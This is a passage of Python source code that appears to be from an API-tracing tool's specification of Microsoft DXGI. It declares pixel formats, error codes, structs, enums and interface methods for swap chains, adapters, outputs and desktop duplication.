"DXGI_FORMAT_UNKNOWN",
"DXGI_FORMAT_R32G32B32A32_TYPELESS",
"DXGI_FORMAT_R32G32B32A32_FLOAT",
"DXGI_FORMAT_R32G32B32A32_UINT",
"DXGI_FORMAT_R32G32B32A32_SINT",
"DXGI_FORMAT_R32G32B32_TYPELESS",
"DXGI_FORMAT_R32G32B32_FLOAT",
"DXGI_FORMAT_R32G32B32_UINT",
"DXGI_FORMAT_R32G32B32_SINT",
"DXGI_FORMAT_R16G16B16A16_TYPELESS",
"DXGI_FORMAT_R16G16B16A16_FLOAT",
"DXGI_FORMAT_R16G16B16A16_UNORM",
"DXGI_FORMAT_R16G16B16A16_UINT",
"DXGI_FORMAT_R16G16B16A16_SNORM",
"DXGI_FORMAT_R16G16B16A16_SINT",
"DXGI_FORMAT_R32G32_TYPELESS",
"DXGI_FORMAT_R32G32_FLOAT",
"DXGI_FORMAT_R32G32_UINT",
"DXGI_FORMAT_R32G32_SINT",
"DXGI_FORMAT_R32G8X24_TYPELESS",
"DXGI_FORMAT_D32_FLOAT_S8X24_UINT",
"DXGI_FORMAT_R32_FLOAT_X8X24_TYPELESS",
"DXGI_FORMAT_X32_TYPELESS_G8X24_UINT",
"DXGI_FORMAT_R10G10B10A2_TYPELESS",
"DXGI_FORMAT_R10G10B10A2_UNORM",
"DXGI_FORMAT_R10G10B10A2_UINT",
"DXGI_FORMAT_R11G11B10_FLOAT",
"DXGI_FORMAT_R8G8B8A8_TYPELESS",
"DXGI_FORMAT_R8G8B8A8_UNORM",
"DXGI_FORMAT_R8G8B8A8_UNORM_SRGB",
"DXGI_FORMAT_R8G8B8A8_UINT",
"DXGI_FORMAT_R8G8B8A8_SNORM",
"DXGI_FORMAT_R8G8B8A8_SINT",
"DXGI_FORMAT_R16G16_TYPELESS",
"DXGI_FORMAT_R16G16_FLOAT",
"DXGI_FORMAT_R16G16_UNORM",
"DXGI_FORMAT_R16G16_UINT",
"DXGI_FORMAT_R16G16_SNORM",
"DXGI_FORMAT_R16G16_SINT",
"DXGI_FORMAT_R32_TYPELESS",
"DXGI_FORMAT_D32_FLOAT",
"DXGI_FORMAT_R32_FLOAT",
"DXGI_FORMAT_R32_UINT",
"DXGI_FORMAT_R32_SINT",
"DXGI_FORMAT_R24G8_TYPELESS",
"DXGI_FORMAT_D24_UNORM_S8_UINT",
"DXGI_FORMAT_R24_UNORM_X8_TYPELESS",
"DXGI_FORMAT_X24_TYPELESS_G8_UINT",
"DXGI_FORMAT_R8G8_TYPELESS",
"DXGI_FORMAT_R8G8_UNORM",
"DXGI_FORMAT_R8G8_UINT",
"DXGI_FORMAT_R8G8_SNORM",
"DXGI_FORMAT_R8G8_SINT",
"DXGI_FORMAT_R16_TYPELESS",
"DXGI_FORMAT_R16_FLOAT",
"DXGI_FORMAT_D16_UNORM",
"DXGI_FORMAT_R16_UNORM",
"DXGI_FORMAT_R16_UINT",
"DXGI_FORMAT_R16_SNORM",
"DXGI_FORMAT_R16_SINT",
"DXGI_FORMAT_R8_TYPELESS",
"DXGI_FORMAT_R8_UNORM",
"DXGI_FORMAT_R8_UINT",
"DXGI_FORMAT_R8_SNORM",
"DXGI_FORMAT_R8_SINT",
"DXGI_FORMAT_A8_UNORM",
"DXGI_FORMAT_R1_UNORM",
"DXGI_FORMAT_R9G9B9E5_SHAREDEXP",
"DXGI_FORMAT_R8G8_B8G8_UNORM",
"DXGI_FORMAT_G8R8_G8B8_UNORM",
"DXGI_FORMAT_BC1_TYPELESS",
"DXGI_FORMAT_BC1_UNORM",
"DXGI_FORMAT_BC1_UNORM_SRGB",
"DXGI_FORMAT_BC2_TYPELESS",
"DXGI_FORMAT_BC2_UNORM",
"DXGI_FORMAT_BC2_UNORM_SRGB",
"DXGI_FORMAT_BC3_TYPELESS",
"DXGI_FORMAT_BC3_UNORM",
"DXGI_FORMAT_BC3_UNORM_SRGB",
"DXGI_FORMAT_BC4_TYPELESS",
"DXGI_FORMAT_BC4_UNORM",
"DXGI_FORMAT_BC4_SNORM",
"DXGI_FORMAT_BC5_TYPELESS",
"DXGI_FORMAT_BC5_UNORM",
"DXGI_FORMAT_BC5_SNORM",
"DXGI_FORMAT_B5G6R5_UNORM",
"DXGI_FORMAT_B5G5R5A1_UNORM",
"DXGI_FORMAT_B8G8R8A8_UNORM",
"DXGI_FORMAT_B8G8R8X8_UNORM",
"DXGI_FORMAT_R10G10B10_XR_BIAS_A2_UNORM",
"DXGI_FORMAT_B8G8R8A8_TYPELESS",
"DXGI_FORMAT_B8G8R8A8_UNORM_SRGB",
"DXGI_FORMAT_B8G8R8X8_TYPELESS",
"DXGI_FORMAT_B8G8R8X8_UNORM_SRGB",
"DXGI_FORMAT_BC6H_TYPELESS",
"DXGI_FORMAT_BC6H_UF16",
"DXGI_FORMAT_BC6H_SF16",
"DXGI_FORMAT_BC7_TYPELESS",
"DXGI_FORMAT_BC7_UNORM",
"DXGI_FORMAT_BC7_UNORM_SRGB",
"DXGI_FORMAT_AYUV",
"DXGI_FORMAT_Y410",
"DXGI_FORMAT_Y416",
"DXGI_FORMAT_NV12",
"DXGI_FORMAT_P010",
"DXGI_FORMAT_P016",
"DXGI_FORMAT_420_OPAQUE",
"DXGI_FORMAT_YUY2",
"DXGI_FORMAT_Y210",
"DXGI_FORMAT_Y216",
"DXGI_FORMAT_NV11",
"DXGI_FORMAT_AI44",
"DXGI_FORMAT_IA44",
"DXGI_FORMAT_P8",
"DXGI_FORMAT_A8P8",
"DXGI_FORMAT_B4G4R4A4_UNORM",
])
HRESULT = MAKE_HRESULT([
"DXGI_STATUS_OCCLUDED",
"DXGI_STATUS_CLIPPED",
"DXGI_STATUS_NO_REDIRECTION",
"DXGI_STATUS_NO_DESKTOP_ACCESS",
"DXGI_STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_STATUS_MODE_CHANGED",
"DXGI_STATUS_MODE_CHANGE_IN_PROGRESS",
"DXGI_ERROR_INVALID_CALL",
"DXGI_ERROR_NOT_FOUND",
"DXGI_ERROR_MORE_DATA",
"DXGI_ERROR_UNSUPPORTED",
"DXGI_ERROR_DEVICE_REMOVED",
"DXGI_ERROR_DEVICE_HUNG",
"DXGI_ERROR_DEVICE_RESET",
"DXGI_ERROR_WAS_STILL_DRAWING",
"DXGI_ERROR_FRAME_STATISTICS_DISJOINT",
"DXGI_ERROR_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_ERROR_DRIVER_INTERNAL_ERROR",
"DXGI_ERROR_NONEXCLUSIVE",
"DXGI_ERROR_NOT_CURRENTLY_AVAILABLE",
"DXGI_ERROR_REMOTE_CLIENT_DISCONNECTED",
"DXGI_ERROR_REMOTE_OUTOFMEMORY",
# IDXGIKeyedMutex::AcquireSync
"WAIT_ABANDONED",
"WAIT_TIMEOUT",
])
DXGI_RGB = Struct("DXGI_RGB", [
(Float, "Red"),
(Float, "Green"),
(Float, "Blue"),
])
DXGI_GAMMA_CONTROL = Struct("DXGI_GAMMA_CONTROL", [
(DXGI_RGB, "Scale"),
(DXGI_RGB, "Offset"),
(Array(DXGI_RGB, 1025), "GammaCurve"),
])
DXGI_GAMMA_CONTROL_CAPABILITIES = Struct("DXGI_GAMMA_CONTROL_CAPABILITIES", [
(BOOL, "ScaleAndOffsetSupported"),
(Float, "MaxConvertedValue"),
(Float, "MinConvertedValue"),
(UINT, "NumGammaControlPoints"),
(Array(Float, "{self}.NumGammaControlPoints"), "ControlPointPositions"),
])
DXGI_RATIONAL = Struct("DXGI_RATIONAL", [
(UINT, "Numerator"),
(UINT, "Denominator"),
])
DXGI_MODE_SCANLINE_ORDER = Enum("DXGI_MODE_SCANLINE_ORDER", [
"DXGI_MODE_SCANLINE_ORDER_UNSPECIFIED",
"DXGI_MODE_SCANLINE_ORDER_PROGRESSIVE",
"DXGI_MODE_SCANLINE_ORDER_UPPER_FIELD_FIRST",
"DXGI_MODE_SCANLINE_ORDER_LOWER_FIELD_FIRST",
])
DXGI_MODE_SCALING = Enum("DXGI_MODE_SCALING", [
"DXGI_MODE_SCALING_UNSPECIFIED",
"DXGI_MODE_SCALING_CENTERED",
"DXGI_MODE_SCALING_STRETCHED",
])
DXGI_MODE_ROTATION = Enum("DXGI_MODE_ROTATION", [
"DXGI_MODE_ROTATION_UNSPECIFIED",
"DXGI_MODE_ROTATION_IDENTITY",
"DXGI_MODE_ROTATION_ROTATE90",
"DXGI_MODE_ROTATION_ROTATE180",
"DXGI_MODE_ROTATION_ROTATE270",
])
DXGI_MODE_DESC = Struct("DXGI_MODE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
])
DXGI_QUALITY_LEVEL = FakeEnum(UINT, [
"DXGI_STANDARD_MULTISAMPLE_QUALITY_PATTERN",
"DXGI_CENTER_MULTISAMPLE_QUALITY_PATTERN",
])
DXGI_SAMPLE_DESC = Struct("DXGI_SAMPLE_DESC", [
(UINT, "Count"),
(DXGI_QUALITY_LEVEL, "Quality"),
])
DXGI_RGBA = Struct("DXGI_RGBA", [
(Float, "r"),
(Float, "g"),
(Float, "b"),
(Float, "a"),
])
IDXGIObject = Interface("IDXGIObject", IUnknown)
IDXGIDeviceSubObject = Interface("IDXGIDeviceSubObject", IDXGIObject)
IDXGIResource = Interface("IDXGIResource", IDXGIDeviceSubObject)
IDXGIKeyedMutex = Interface("IDXGIKeyedMutex", IDXGIDeviceSubObject)
IDXGISurface = Interface("IDXGISurface", IDXGIDeviceSubObject)
IDXGISurface1 = Interface("IDXGISurface1", IDXGISurface)
IDXGIAdapter = Interface("IDXGIAdapter", IDXGIObject)
IDXGIOutput = Interface("IDXGIOutput", IDXGIObject)
IDXGISwapChain = Interface("IDXGISwapChain", IDXGIDeviceSubObject)
IDXGIFactory = Interface("IDXGIFactory", IDXGIObject)
IDXGIDevice = Interface("IDXGIDevice", IDXGIObject)
IDXGIFactory1 = Interface("IDXGIFactory1", IDXGIFactory)
IDXGIAdapter1 = Interface("IDXGIAdapter1", IDXGIAdapter)
IDXGIDevice1 = Interface("IDXGIDevice1", IDXGIDevice)
DXGI_USAGE = Flags(UINT, [
"DXGI_CPU_ACCESS_NONE", # 0
"DXGI_CPU_ACCESS_SCRATCH", # 3
"DXGI_CPU_ACCESS_DYNAMIC", # 1
"DXGI_CPU_ACCESS_READ_WRITE", # 2
"DXGI_USAGE_SHADER_INPUT",
"DXGI_USAGE_RENDER_TARGET_OUTPUT",
"DXGI_USAGE_BACK_BUFFER",
"DXGI_USAGE_SHARED",
"DXGI_USAGE_READ_ONLY",
"DXGI_USAGE_DISCARD_ON_PRESENT",
"DXGI_USAGE_UNORDERED_ACCESS",
])
DXGI_FRAME_STATISTICS = Struct("DXGI_FRAME_STATISTICS", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
])
DXGI_MAPPED_RECT = Struct("DXGI_MAPPED_RECT", [
(INT, "Pitch"),
(LinearPointer(BYTE, "_MappedSize"), "pBits"),
])
DXGI_ADAPTER_DESC = Struct("DXGI_ADAPTER_DESC", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
])
DXGI_OUTPUT_DESC = Struct("DXGI_OUTPUT_DESC", [
(WString, "DeviceName"),
(RECT, "DesktopCoordinates"),
(BOOL, "AttachedToDesktop"),
(DXGI_MODE_ROTATION, "Rotation"),
(HMONITOR, "Monitor"),
])
DXGI_SHARED_RESOURCE = Struct("DXGI_SHARED_RESOURCE", [
(HANDLE, "Handle"),
])
DXGI_RESOURCE_PRIORITY = FakeEnum(UINT, [
"DXGI_RESOURCE_PRIORITY_MINIMUM",
"DXGI_RESOURCE_PRIORITY_LOW",
"DXGI_RESOURCE_PRIORITY_NORMAL",
"DXGI_RESOURCE_PRIORITY_HIGH",
"DXGI_RESOURCE_PRIORITY_MAXIMUM",
])
DXGI_RESIDENCY = Enum("DXGI_RESIDENCY", [
"DXGI_RESIDENCY_FULLY_RESIDENT",
"DXGI_RESIDENCY_RESIDENT_IN_SHARED_MEMORY",
"DXGI_RESIDENCY_EVICTED_TO_DISK",
])
DXGI_SURFACE_DESC = Struct("DXGI_SURFACE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
])
DXGI_SWAP_EFFECT = Enum("DXGI_SWAP_EFFECT", [
"DXGI_SWAP_EFFECT_DISCARD",
"DXGI_SWAP_EFFECT_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_DISCARD",
])
DXGI_SWAP_CHAIN_FLAG = Flags(UINT, [
"DXGI_SWAP_CHAIN_FLAG_NONPREROTATED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH",
"DXGI_SWAP_CHAIN_FLAG_GDI_COMPATIBLE",
"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_CONTENT",
"DXGI_SWAP_CHAIN_FLAG_RESTRICT_SHARED_RESOURCE_DRIVER",
"DXGI_SWAP_CHAIN_FLAG_DISPLAY_ONLY",
"DXGI_SWAP_CHAIN_FLAG_FRAME_LATENCY_WAITABLE_OBJECT",
"DXGI_SWAP_CHAIN_FLAG_FOREGROUND_LAYER",
"DXGI_SWAP_CHAIN_FLAG_FULLSCREEN_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_YUV_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_HW_PROTECTED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_TEARING",
#"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_TO_ALL_HOLOGRAPHIC_DISPLAYS", # DXGI 1.6
])
DXGI_SWAP_CHAIN_DESC = Struct("DXGI_SWAP_CHAIN_DESC", [
(DXGI_MODE_DESC, "BufferDesc"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(HWND, "OutputWindow"),
(BOOL, "Windowed"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
IDXGIObject.methods += [
StdMethod(HRESULT, "SetPrivateData", [(REFGUID, "Name"), (UINT, "DataSize"), (OpaqueBlob(Const(Void), "DataSize"), "pData")], sideeffects=False),
StdMethod(HRESULT, "SetPrivateDataInterface", [(REFGUID, "Name"), (OpaquePointer(Const(IUnknown)), "pUnknown")], sideeffects=False),
StdMethod(HRESULT, "GetPrivateData", [(REFGUID, "Name"), InOut(Pointer(UINT), "pDataSize"), Out(OpaquePointer(Void), "pData")], sideeffects=False),
StdMethod(HRESULT, "GetParent", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParent")]),
]
IDXGIDeviceSubObject.methods += [
StdMethod(HRESULT, "GetDevice", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppDevice")]),
]
SHARED_HANDLE = Handle("shared_handle", RAW_HANDLE)
IDXGIResource.methods += [
StdMethod(HRESULT, "GetSharedHandle", [Out(Pointer(SHARED_HANDLE), "pSharedHandle")]),
StdMethod(HRESULT, "GetUsage", [Out(Pointer(DXGI_USAGE), "pUsage")], sideeffects=False),
StdMethod(HRESULT, "SetEvictionPriority", [(DXGI_RESOURCE_PRIORITY, "EvictionPriority")]),
StdMethod(HRESULT, "GetEvictionPriority", [Out(Pointer(DXGI_RESOURCE_PRIORITY), "pEvictionPriority")], sideeffects=False),
]
DWORD_TIMEOUT = FakeEnum(DWORD, [
"INFINITE",
])
IDXGIKeyedMutex.methods += [
StdMethod(HRESULT, "AcquireSync", [(UINT64, "Key"), (DWORD_TIMEOUT, "dwMilliseconds")], sideeffects=False),
StdMethod(HRESULT, "ReleaseSync", [(UINT64, "Key")]),
]
DXGI_MAP = Flags(UINT, [
"DXGI_MAP_READ",
"DXGI_MAP_WRITE",
"DXGI_MAP_DISCARD",
])
IDXGISurface.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SURFACE_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "Map", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect"), (DXGI_MAP, "MapFlags")]),
StdMethod(HRESULT, "Unmap", []),
]
IDXGISurface1.methods += [
StdMethod(HRESULT, "GetDC", [(BOOL, "Discard"), Out(Pointer(HDC), "phdc")]),
StdMethod(HRESULT, "ReleaseDC", [(Pointer(RECT), "pDirtyRect")]),
]
IDXGIAdapter.methods += [
StdMethod(HRESULT, "EnumOutputs", [(UINT, "Output"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_ADAPTER_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "CheckInterfaceSupport", [(REFGUID, "InterfaceName"), Out(Pointer(LARGE_INTEGER), "pUMDVersion")], sideeffects=False),
]
DXGI_ENUM_MODES = Flags(UINT, [
"DXGI_ENUM_MODES_INTERLACED",
"DXGI_ENUM_MODES_SCALING",
"DXGI_ENUM_MODES_STEREO",
"DXGI_ENUM_MODES_DISABLED_STEREO",
])
IDXGIOutput.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_OUTPUT_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "GetDisplayModeList", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode", [(Pointer(Const(DXGI_MODE_DESC)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "WaitForVBlank", []),
StdMethod(HRESULT, "TakeOwnership", [(ObjPointer(IUnknown), "pDevice"), (BOOL, "Exclusive")]),
StdMethod(Void, "ReleaseOwnership", []),
StdMethod(HRESULT, "GetGammaControlCapabilities", [Out(Pointer(DXGI_GAMMA_CONTROL_CAPABILITIES), "pGammaCaps")], sideeffects=False),
StdMethod(HRESULT, "SetGammaControl", [(Pointer(Const(DXGI_GAMMA_CONTROL)), "pArray")], sideeffects=False), # Avoid NumGammaControlPoints mismatch
StdMethod(HRESULT, "GetGammaControl", [Out(Pointer(DXGI_GAMMA_CONTROL), "pArray")], sideeffects=False),
StdMethod(HRESULT, "SetDisplaySurface", [(ObjPointer(IDXGISurface), "pScanoutSurface")]),
StdMethod(HRESULT, "GetDisplaySurfaceData", [(ObjPointer(IDXGISurface), "pDestination")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
]
DXGI_PRESENT = Flags(UINT, [
"DXGI_PRESENT_TEST",
"DXGI_PRESENT_DO_NOT_SEQUENCE",
"DXGI_PRESENT_RESTART",
"DXGI_PRESENT_DO_NOT_WAIT",
"DXGI_PRESENT_STEREO_PREFER_RIGHT",
"DXGI_PRESENT_STEREO_TEMPORARY_MONO",
"DXGI_PRESENT_RESTRICT_TO_OUTPUT",
"DXGI_PRESENT_USE_DURATION",
])
IDXGISwapChain.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "SetFullscreenState", [(BOOL, "Fullscreen"), (ObjPointer(IDXGIOutput), "pTarget")]),
StdMethod(HRESULT, "GetFullscreenState", [Out(Pointer(BOOL), "pFullscreen"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppTarget")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
DXGI_MWA = Flags(UINT, [
"DXGI_MWA_NO_WINDOW_CHANGES",
"DXGI_MWA_NO_ALT_ENTER",
"DXGI_MWA_NO_PRINT_SCREEN",
"DXGI_MWA_VALID",
])
IDXGIFactory.methods += [
StdMethod(HRESULT, "EnumAdapters", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
StdMethod(HRESULT, "MakeWindowAssociation", [(HWND, "WindowHandle"), (DXGI_MWA, "Flags")], sideeffects=False),
StdMethod(HRESULT, "GetWindowAssociation", [Out(Pointer(HWND), "pWindowHandle")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), Out(Pointer(ObjPointer(IDXGISwapChain)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSoftwareAdapter", [(HMODULE, "Module"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
]
IDXGIDevice.methods += [
StdMethod(HRESULT, "GetAdapter", [Out(Pointer(ObjPointer(IDXGIAdapter)), "pAdapter")]),
StdMethod(HRESULT, "CreateSurface", [(Pointer(Const(DXGI_SURFACE_DESC)), "pDesc"), (UINT, "NumSurfaces"), (DXGI_USAGE, "Usage"), (Pointer(Const(DXGI_SHARED_RESOURCE)), "pSharedResource"), Out(Pointer(ObjPointer(IDXGISurface)), "ppSurface")]),
StdMethod(HRESULT, "QueryResourceResidency", [(Array(Const(ObjPointer(IUnknown)), "NumResources"), "ppResources"), Out(Array(DXGI_RESIDENCY, "NumResources"), "pResidencyStatus"), (UINT, "NumResources")], sideeffects=False),
StdMethod(HRESULT, "SetGPUThreadPriority", [(INT, "Priority")]),
StdMethod(HRESULT, "GetGPUThreadPriority", [Out(Pointer(INT), "pPriority")], sideeffects=False),
]
DXGI_ADAPTER_FLAG = FakeEnum(UINT, [
"DXGI_ADAPTER_FLAG_NONE",
"DXGI_ADAPTER_FLAG_REMOTE",
"DXGI_ADAPTER_FLAG_SOFTWARE",
])
DXGI_ADAPTER_DESC1 = Struct("DXGI_ADAPTER_DESC1", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_DISPLAY_COLOR_SPACE = Struct("DXGI_DISPLAY_COLOR_SPACE", [
(Array(Array(FLOAT, 8), 2), "PrimaryCoordinates"),
(Array(Array(FLOAT, 16), 2), "WhitePoints"),
])
IDXGIFactory1.methods += [
StdMethod(HRESULT, "EnumAdapters1", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter1)), "ppAdapter")]),
StdMethod(BOOL, "IsCurrent", [], sideeffects=False),
]
IDXGIAdapter1.methods += [
StdMethod(HRESULT, "GetDesc1", [Out(Pointer(DXGI_ADAPTER_DESC1), "pDesc")], sideeffects=False),
]
IDXGIDevice1.methods += [
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
]
dxgi = Module('dxgi')
dxgi.addInterfaces([
IDXGIKeyedMutex,
IDXGIFactory1,
IDXGIDevice1,
IDXGIAdapter1,
IDXGIResource,
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "CreateDXGIFactory1", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "DXGID3D10CreateDevice", [(HMODULE, "hModule"), (ObjPointer(IDXGIFactory), "pFactory"), (ObjPointer(IDXGIAdapter), "pAdapter"), (UINT, "Flags"), (OpaquePointer(Const(IUnknown)), "pUnknown"), Out(Pointer(ObjPointer(Void)), "ppDevice")], internal=True),
StdFunction(HRESULT, "DXGID3D10CreateLayeredDevice", [(UINT), (UINT), (UINT), (UINT), (UINT)], internal=True),
StdFunction(SIZE_T, "DXGID3D10GetLayeredDeviceSize", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
StdFunction(HRESULT, "DXGID3D10RegisterLayers", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
])
#
# DXGI 1.2
#
IDXGIDisplayControl = Interface("IDXGIDisplayControl", IUnknown)
IDXGIDisplayControl.methods += [
StdMethod(BOOL, "IsStereoEnabled", [], sideeffects=False),
StdMethod(Void, "SetStereoEnabled", [(BOOL, "enabled")]),
]
DXGI_OUTDUPL_MOVE_RECT = Struct("DXGI_OUTDUPL_MOVE_RECT", [
(POINT, "SourcePoint"),
(RECT, "DestinationRect"),
])
DXGI_OUTDUPL_DESC = Struct("DXGI_OUTDUPL_DESC", [
(DXGI_MODE_DESC, "ModeDesc"),
(DXGI_MODE_ROTATION, "Rotation"),
(BOOL, "DesktopImageInSystemMemory"),
])
DXGI_OUTDUPL_POINTER_POSITION = Struct("DXGI_OUTDUPL_POINTER_POSITION", [
(POINT, "Position"),
(BOOL, "Visible"),
])
DXGI_OUTDUPL_POINTER_SHAPE_TYPE = Enum("DXGI_OUTDUPL_POINTER_SHAPE_TYPE", [
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MONOCHROME",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_COLOR",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MASKED_COLOR",
])
DXGI_OUTDUPL_POINTER_SHAPE_INFO = Struct("DXGI_OUTDUPL_POINTER_SHAPE_INFO", [
(UINT, "Type"),
(UINT, "Width"),
(UINT, "Height"),
(UINT, "Pitch"),
(POINT, "HotSpot"),
])
DXGI_OUTDUPL_FRAME_INFO = Struct("DXGI_OUTDUPL_FRAME_INFO", [
(LARGE_INTEGER, "LastPresentTime"),
(LARGE_INTEGER, "LastMouseUpdateTime"),
(UINT, "AccumulatedFrames"),
(BOOL, "RectsCoalesced"),
(BOOL, "ProtectedContentMaskedOut"),
(DXGI_OUTDUPL_POINTER_POSITION, "PointerPosition"),
(UINT, "TotalMetadataBufferSize"),
(UINT, "PointerShapeBufferSize"),
])
IDXGIOutputDuplication = Interface("IDXGIOutputDuplication", IDXGIObject)
IDXGIOutputDuplication.methods += [
StdMethod(Void, "GetDesc", [Out(Pointer(DXGI_OUTDUPL_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "AcquireNextFrame", [(UINT, "TimeoutInMilliseconds"), Out(Pointer(DXGI_OUTDUPL_FRAME_INFO), "pFrameInfo"), Out(Pointer(ObjPointer(IDXGIResource)), "ppDesktopResource")]),
StdMethod(HRESULT, "GetFrameDirtyRects", [(UINT, "DirtyRectsBufferSize"), Out(Array(RECT, "DirtyRectsBufferSize"), "pDirtyRectsBuffer"), Out(Pointer(UINT), "pDirtyRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFrameMoveRects", [(UINT, "MoveRectsBufferSize"), Out(Array(DXGI_OUTDUPL_MOVE_RECT, "MoveRectsBufferSize"), "pMoveRectBuffer"), Out(Pointer(UINT), "pMoveRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFramePointerShape", [(UINT, "PointerShapeBufferSize"), Out(OpaqueBlob(Void, "PointerShapeBufferSize"), "pPointerShapeBuffer"), Out(Pointer(UINT), "pPointerShapeBufferSizeRequired"), Out(Pointer(DXGI_OUTDUPL_POINTER_SHAPE_INFO), "pPointerShapeInfo")], sideeffects=False),
StdMethod(HRESULT, "MapDesktopSurface", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect")], sideeffects=False),
StdMethod(HRESULT, "UnMapDesktopSurface", [], sideeffects=False),
StdMethod(HRESULT, "ReleaseFrame", []),
]
DXGI_ALPHA_MODE = Enum("DXGI_ALPHA_MODE", [
"DXGI_ALPHA_MODE_UNSPECIFIED",
"DXGI_ALPHA_MODE_PREMULTIPLIED",
"DXGI_ALPHA_MODE_STRAIGHT",
"DXGI_ALPHA_MODE_IGNORE",
])
IDXGISurface2 = Interface("IDXGISurface2", IDXGISurface1)
IDXGISurface2.methods += [
StdMethod(HRESULT, "GetResource", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParentResource"), Out(Pointer(UINT), "pSubresourceIndex")]),
]
